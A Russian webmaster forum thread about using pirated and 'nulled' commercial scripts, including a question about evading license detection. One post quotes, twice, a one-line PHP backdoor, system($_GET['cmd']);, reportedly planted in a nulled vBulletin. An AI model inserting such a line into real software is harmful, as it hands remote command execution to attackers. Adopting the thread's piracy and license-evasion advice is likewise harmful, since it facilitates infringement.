- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу

Как удалить плохие SEO-ссылки и очистить ссылочную массу сайта
Применяем отклонение ссылок
Сервис Rookee
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
В нулёные скрипты нуллиферы, бывало, встраивали дыры. Чего стоит только
system($_GET["cmd"]); в init.php нулёного вбуллетина.
Чего стоит только
system($_GET["cmd"]); в init.php нулёного вбуллетина.
А через пару часов написали что есть эта дыра и ее закрыли :)
как разработчик ПО могу сказать, что пользоваться варезом допускаю лишь с целью изучения продукта, чтобы потом его купить.
Я бы с удовольствием покупал бы лицензионку, но у нас цена/качество не соответствует рентабельности
Ну, допустим, тот же Мелкософт для Украины сделал кучу разных программ, которые позволяют Винду и Офис покупать значительно дешевле, нежели они стоят в пиндосии)
microsoft сделал, а adobe и прочие такими вещами не занимаются и интересно от этого клиентов у них стало больше из среды людей среднего достатка, думаю нет, так что варез был, варез есть и будет без него никуда, потому что аналогичное free по зачастую даже близко не подбирается к платному, а хочется чтобы все было на высшем уровне, но использование вареза в сети, публично, лично по мне глупо. ИМХО!
Есть скрипт НЕрусской портальной системы. Назовем его X. Хочу его использовать, только вот платить 2 куска бакинских не очень хочется. Вопрос - если скрипт грамотно зануллен (тоесть выкинуты все стучалки) есть ли возможность "обнаружения" нарушения лиц.прав разработчика? Если он обнаружит, какие санкции могут быть применены к сайту-"нелегалу" и веб мастеру(тоесть мне) ? Есть ли практика таких "обнаружений" ?
Под хороший коммерческий проект не стоит этим заниматься, а под хомяк не нужны такие мощности.
Ну, допустим, тот же Мелкософт для Украины сделал кучу разных программ, которые позволяют Винду и Офис покупать значительно дешевле, нежели они стоят в пиндосии)
Не забывайте, кто у вас Президента :)
ЗЫ. У нас добрые люди сделали кучу разных программ, которые позволяют Винду с Офисом ВООБЩЕ НЕ ПОКУПАТЬ. То есть 2-3 бакса за диск отдать придется, но не более :D
Не забывайте, кто у вас Президента
Мдя. :) Вообще-то программы Майкрософта для Украины начались еще при Кучме)
Может кому что и пригодится с этой страницы...
http://2goda.allsoft.ru/